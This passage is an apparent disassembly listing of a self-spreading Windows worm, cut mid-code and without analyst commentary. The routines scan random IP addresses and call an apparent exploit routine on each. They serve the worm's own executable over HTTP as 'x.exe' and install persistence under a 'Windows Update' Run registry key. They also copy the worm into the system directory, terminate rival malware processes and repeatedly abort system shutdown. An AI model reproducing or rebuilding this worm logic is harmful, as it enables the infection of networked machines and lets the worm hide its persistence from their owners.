mov esi, dword_31001098
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31001A04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A5A proc near ; CODE XREF: sub_3100202D+3E�p
; sub_310020F4+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3100114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31001A7B
call dword_31001150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31001A7B: ; CODE XREF: sub_31001A5A+15�j
lea eax, [ebp+var_34]
push eax
call dword_31001154 ; gethostbyname
test eax, eax
jnz short loc_31001A90
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31001A90: ; CODE XREF: sub_31001A5A+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31001A5A endp
; =============== S U B R O U T I N E =======================================
sub_31001A99 proc near ; CODE XREF: sub_31001F41+22�p
; sub_31001FA5+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31001134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31001A99 endp
; =============== S U B R O U T I N E =======================================
sub_31001AAF proc near ; CODE XREF: sub_31001E06+40�p
; sub_31001E06+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_310010B8 ; OpenEventA
test eax, eax
jz short locret_31001AC8
push eax
call dword_310010B4 ; SetEvent
locret_31001AC8: ; CODE XREF: sub_31001AAF+10�j
retn
sub_31001AAF endp
; =============== S U B R O U T I N E =======================================
sub_31001AC9 proc near ; CODE XREF: UPX0:31002B69�p
push esi
mov esi, dword_310010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31001AC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001ADF proc near ; DATA XREF: sub_31001C18+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31001B10
push 1
jmp loc_31001BCB
; ---------------------------------------------------------------------------
loc_31001B10: ; CODE XREF: sub_31001ADF+28�j
mov esi, dword_310010F4
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
mov esi, dword_31001168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31004FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31002B92 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31001B8D: ; CODE XREF: sub_31001ADF+E8�j
mov eax, dword_31004FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31001B9F
mov eax, ecx
loc_31001B9F: ; CODE XREF: sub_31001ADF+BC�j
test eax, eax
jz short loc_31001BEC
push 0
push eax
mov eax, dword_31004FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31001BC9
cmp eax, 1000h
jb short loc_31001BEC
push 64h
add edi, eax
call dword_31001080 ; Sleep
jmp short loc_31001B8D
; ---------------------------------------------------------------------------
loc_31001BC9: ; CODE XREF: sub_31001ADF+D5�j
push 2
loc_31001BCB: ; CODE XREF: sub_31001ADF+2C�j
pop eax
jmp short loc_31001C11
; ---------------------------------------------------------------------------
loc_31001BCE: ; CODE XREF: sub_31001ADF+49�j
; sub_31001ADF+61�j
mov esi, dword_31001168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31004A80
push ebx
call esi ; send
loc_31001BEC: ; CODE XREF: sub_31001ADF+C2�j
; sub_31001ADF+DC�j
push 7D0h
call dword_31001080 ; Sleep
push 2
push ebx
call dword_31001170 ; shutdown
push ebx
call dword_31001174 ; closesocket
push 0
call dword_310010BC ; ExitThread
xor eax, eax
loc_31001C11: ; CODE XREF: sub_31001ADF+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001C18 proc near ; DATA XREF: sub_31001E06+DE�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_3100195C
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31004FBC, ebx
call sub_31002264
add esp, 14h
test eax, eax
jnz loc_31001D4D
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_310010C8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31001C84
push 1
call dword_310010BC ; ExitThread
loc_31001C84: ; CODE XREF: sub_31001C18+62�j
push ebx
push esi
call dword_310010C4 ; GetFileSize
push eax
mov dword_31004FC0, eax
call sub_31002680
pop ecx
mov dword_31004FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31004FC0
push eax
push esi
call dword_310010C0 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31004FC0, eax
call dword_31001098 ; CloseHandle
push ebx
push 1
push 2
call dword_31001158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31002B8C ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31001CE6: ; CODE XREF: sub_31001C18+E5�j
; sub_31001C18+ED�j ...
call dword_310010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31004FCC, eax
jz short loc_31001CE6
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31001CE6
push eax
call dword_31001160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31001140 ; bind
test eax, eax
jnz short loc_31001CE6
push 64h
push edi
call dword_31001144 ; listen
mov [ebp+var_8], esi
pop esi
loc_31001D2F: ; CODE XREF: sub_31001C18+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31001148 ; accept
push eax
push offset sub_31001ADF
call sub_310019B3
pop ecx
pop ecx
jmp short loc_31001D2F
; ---------------------------------------------------------------------------
loc_31001D4D: ; CODE XREF: sub_31001C18+3D�j
push ebx
call dword_310010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31001C18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001D5C proc near ; CODE XREF: sub_31001E06:loc_31001EDE�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3100113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31001D5C endp
; ---------------------------------------------------------------------------
loc_31001D88: ; CODE XREF: UPX1:31006C28�j
push 0
call dword_310010A0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31004FD0, eax
call dword_310010D4 ; DeleteFileA
call sub_3100195C
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
call dword_310010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31001DCA
push 1
call dword_310010CC ; ExitProcess
loc_31001DCA: ; CODE XREF: UPX0:31001DC0�j
call sub_310017C9
call sub_310023C8
call sub_31002542
push offset sub_31001E06
call sub_31001851
test eax, eax
pop ecx
jz short loc_31001DEF
push 0
call sub_31001E06
loc_31001DEF: ; CODE XREF: UPX0:31001DE6�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31001DF2 proc near ; CODE XREF: sub_31001E06:loc_31001F07�p
; sub_31001F41:loc_31001F5A�p ...
push 0
push dword_31004FC8
call dword_310010D8 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31001DF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001E06 proc near ; CODE XREF: UPX0:31001DEA�p
; DATA XREF: UPX0:31001DD9�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31001180
push offset loc_31002BD0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13x ; "u13x"
xor edi, edi
push edi
push 1
push edi
call dword_310010DC ; CreateEventA
mov dword_31004FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_31001AAF
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_3100198A
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_3100198A
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31001EDE
push offset aWs2_32 ; "ws2_32"
mov esi, dword_31001090
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
loc_31001EDE: ; CODE XREF: sub_31001E06+9D�j
call sub_31001D5C
push edi
push offset sub_31001C18
call sub_31001999
push edi
push offset loc_31002B40
call sub_31001999
push edi
push offset loc_31002150
call sub_31001999
add esp, 18h
loc_31001F07: ; CODE XREF: sub_31001E06+11C�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F24
push edi
call dword_31001018 ; AbortSystemShutdownA
push 1388h
call dword_31001080 ; Sleep
jmp short loc_31001F07
; ---------------------------------------------------------------------------
loc_31001F24: ; CODE XREF: sub_31001E06+108�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001E06 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001F41 proc near ; DATA XREF: sub_31001FA5+55�o
; sub_3100202D+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001F50
push 1
pop eax
jmp short locret_31001FA1
; ---------------------------------------------------------------------------
loc_31001F50: ; CODE XREF: sub_31001F41+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31001F5A: ; CODE XREF: sub_31001F41+5A�j
call sub_31001DF2
test eax, eax
jnz short loc_31001F9D
call sub_31001A99
test eax, eax
jz short loc_31001F9D
cmp [ebp+var_1], bl
jz short loc_31001F96
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31001262
movzx esi, word_31004FDC
pop ecx
call dword_310010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31001080 ; Sleep
loc_31001F96: ; CODE XREF: sub_31001F41+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31001F5A
loc_31001F9D: ; CODE XREF: sub_31001F41+20�j
; sub_31001F41+29�j
pop esi
xor eax, eax
pop ebx
locret_31001FA1: ; CODE XREF: sub_31001F41+D�j
leave
retn 4
sub_31001F41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001FA5 proc near ; DATA XREF: sub_3100202D+7E�o
; UPX0:310021E5�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31001FB3
push 1
pop eax
jmp short loc_31002029
; ---------------------------------------------------------------------------
loc_31001FB3: ; CODE XREF: sub_31001FA5+7�j
push ebx
push esi
push edi
call sub_3100195C
mov esi, dword_310010F8
xor ebx, ebx
loc_31001FC3: ; CODE XREF: sub_31001FA5+7D�j
call sub_31001DF2
test eax, eax
jnz short loc_31002024
call sub_31001A99
test eax, eax
jz short loc_31002024
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31004FD4
mov byte ptr [ebp+arg_0+3], al
call dword_310010E0 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31001262
test eax, eax
pop ecx
jnz short loc_31002006
push [ebp+arg_0]
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_31002006: ; CODE XREF: sub_31001FA5+50�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31001080 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31001FC3
loc_31002024: ; CODE XREF: sub_31001FA5+25�j
; sub_31001FA5+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31002029: ; CODE XREF: sub_31001FA5+C�j
pop ebp
retn 4
sub_31001FA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100202D proc near ; DATA XREF: UPX0:310021FD�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_3100195C
call sub_31001DF2
test eax, eax
jnz loc_310020E6
push ebx
mov ebx, dword_31001080
push esi
mov esi, dword_310010F8
push edi
loc_31002053: ; CODE XREF: sub_3100202D+48�j
; sub_3100202D+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31002062: ; CODE XREF: sub_3100202D+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31002062
call sub_31001A5A
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31002053
call sub_31001A99
test eax, eax
jz short loc_310020BE
push offset dword_31004FD4
call dword_310010E0 ; InterlockedIncrement
push edi
call sub_31001262
test eax, eax
pop ecx
jnz short loc_310020C5
push edi
push offset sub_31001F41
call sub_310019B3
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_310020AA: ; CODE XREF: sub_3100202D+8D�j
push edi
push offset sub_31001FA5
call sub_310019B3
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_310020AA
jmp short loc_310020C5
; ---------------------------------------------------------------------------
loc_310020BE: ; CODE XREF: sub_3100202D+51�j
push 2710h
call ebx ; Sleep
loc_310020C5: ; CODE XREF: sub_3100202D+67�j
; sub_3100202D+8F�j
movzx edi, word_31004FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31001DF2
test eax, eax
jz loc_31002053
pop edi
pop esi
pop ebx
loc_310020E6: ; CODE XREF: sub_3100202D+11�j
push 0
call dword_310010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_3100202D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310020F4 proc near ; CODE XREF: UPX0:310021C2�p
; UPX0:loc_31002228�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31001A5A
push eax
call dword_3100115C ; inet_ntoa
mov esi, dword_31001078
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_31004FCC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3100111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31004002
call esi ; lstrcpyA
push offset byte_31004000
call dword_3100107C ; lstrlenA
mov byte_31004000[eax], 0DFh
pop esi
leave
retn
sub_310020F4 endp
; ---------------------------------------------------------------------------
loc_31002150: ; DATA XREF: sub_31001E06+F4�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31004FD4, ebx
call sub_31001A99
mov esi, dword_31001080
mov edi, 1388h
test eax, eax
jnz short loc_3100217E
loc_31002172: ; CODE XREF: UPX0:3100217C�j
push edi
call esi ; Sleep
call sub_31001A99
test eax, eax
jz short loc_31002172
loc_3100217E: ; CODE XREF: UPX0:31002170�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31001134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31004FD8, ebx
pop ebp
mov word_31004FDC, 96h
jz short loc_310021BB
mov dword_31004FD8, 1
mov ebp, 15Eh
mov word_31004FDC, 14h
loc_310021BB: ; CODE XREF: UPX0:310021A1�j
call sub_31001A5A
mov ebx, eax
call sub_310020F4
cmp ebx, 100007Fh
jz short loc_310021DC
push ebx
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_310021DC: ; CODE XREF: UPX0:310021CD�j
mov dword ptr [esp+10h], 4
loc_310021E4: ; CODE XREF: UPX0:310021F5�j
push ebx
push offset sub_31001FA5
call sub_310019B3
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_310021E4
test ebp, ebp
jle short loc_3100220C
loc_310021FB: ; CODE XREF: UPX0:3100220A�j
push 0
push offset sub_3100202D
call sub_310019B3
pop ecx
dec ebp
pop ecx
jnz short loc_310021FB
loc_3100220C: ; CODE XREF: UPX0:310021F9�j
; UPX0:31002218�j ...
call sub_31001A99
test eax, eax
jz short loc_3100221A
push edi
call esi ; Sleep
jmp short loc_3100220C
; ---------------------------------------------------------------------------
loc_3100221A: ; CODE XREF: UPX0:31002213�j
; UPX0:31002226�j
call sub_31001A99
test eax, eax
jnz short loc_31002228
push edi
call esi ; Sleep
jmp short loc_3100221A
; ---------------------------------------------------------------------------
loc_31002228: ; CODE XREF: UPX0:31002221�j
call sub_310020F4
jmp short loc_3100220C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100222F proc near ; CODE XREF: sub_310023C8+8C�p
; sub_31002542+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31002262
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
loc_31002262: ; CODE XREF: sub_3100222F+1C�j
pop ebp
retn
sub_3100222F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002264 proc near ; CODE XREF: sub_31001C18+33�p
; sub_310023C8+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3100100C ; RegOpenKeyExA
test eax, eax
jz short loc_31002290
push 1
pop eax
jmp short loc_310022BA
; ---------------------------------------------------------------------------
loc_31002290: ; CODE XREF: sub_31002264+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31001008 ; RegQueryValueExA
test eax, eax
jz short loc_310022AF
push 2
pop esi
loc_310022AF: ; CODE XREF: sub_31002264+46�j
push [ebp+arg_10]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_310022BA: ; CODE XREF: sub_31002264+2A�j
pop esi
leave
retn
sub_31002264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310022BD proc near ; CODE XREF: sub_31002476+96�p
; sub_31002542+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001000 ; RegCreateKeyExA
test eax, eax
jz short loc_310022E6
push 1
pop eax
jmp short loc_3100230D
; ---------------------------------------------------------------------------
loc_310022E6: ; CODE XREF: sub_310022BD+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31001004 ; RegSetValueExA
test eax, eax
jz short loc_31002302
push 2
pop esi
loc_31002302: ; CODE XREF: sub_310022BD+40�j
push [ebp+arg_4]
call dword_31001014 ; RegCloseKey
mov eax, esi
loc_3100230D: ; CODE XREF: sub_310022BD+27�j
pop esi
pop ebp
retn
sub_310022BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002310 proc near ; CODE XREF: sub_310023C8+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_3100107C ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_310023C4
loc_31002330: ; CODE XREF: sub_31002310+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31002339
dec esi
jns short loc_31002330
loc_31002339: ; CODE XREF: sub_31002310+24�j
push 0
push 2
call sub_31002BE8 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_310023C4
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31002B8C ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31002BE2 ; Process32First
test eax, eax
jz short loc_310023C4
lea esi, [esi+ebx+1]
loc_31002381: ; CODE XREF: sub_31002310+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_310010F4 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_310023B1
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_3100109C ; OpenProcess
push 0
push eax
call dword_31001070 ; TerminateProcess
loc_310023B1: ; CODE XREF: sub_31002310+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31002BDC ; Process32Next
test eax, eax
jnz short loc_31002381
loc_310023C4: ; CODE XREF: sub_31002310+1A�j
; sub_31002310+38�j ...
pop esi
pop ebx
leave
retn
sub_31002310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310023C8 proc near ; CODE XREF: UPX0:31001DCF�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31002431: ; CODE XREF: sub_310023C8+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_31002468
push ebx
push edi
push esi
call sub_3100222F
lea eax, [ebp+var_138]
push eax
call sub_31002310
add esp, 10h
loc_31002468: ; CODE XREF: sub_310023C8+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31002431
pop edi
pop esi
pop ebx
leave
retn
sub_310023C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002476 proc near ; CODE XREF: sub_31002542+D1�p
; sub_31002542+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3100248B
push [ebp+arg_0]
call dword_310010D4 ; DeleteFileA
loc_3100248B: ; CODE XREF: sub_31002476+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31001058 ; GetSystemDirectoryA
test eax, eax
jz locret_31002540
push esi
call dword_310010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_310019D4
mov esi, dword_3100105C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31004CAC ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31001060 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_3100107C ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_310022BD
add esp, 14h
push dword_31004FC4
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31001064 ; WinExec
push 1F4h
call dword_31001080 ; Sleep
push 0
call dword_310010CC ; ExitProcess
pop esi
locret_31002540: ; CODE XREF: sub_31002476+23�j
leave
retn
sub_31002476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002542 proc near ; CODE XREF: UPX0:31001DD4�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31001050 ; GetModuleFileNameA
test eax, eax
jz loc_3100267B
and dword_31004FE0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jz short loc_310025C8
call dword_310010F8 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_310019D4
pop ecx
pop ecx
push ebx
call dword_3100107C ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_310022BD
add esp, 14h
jmp short loc_310025D7
; ---------------------------------------------------------------------------
loc_310025C8: ; CODE XREF: sub_31002542+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31001078 ; lstrcpyA
loc_310025D7: ; CODE XREF: sub_31002542+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31002264
add esp, 14h
test eax, eax
jz short loc_3100261D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_310022BD
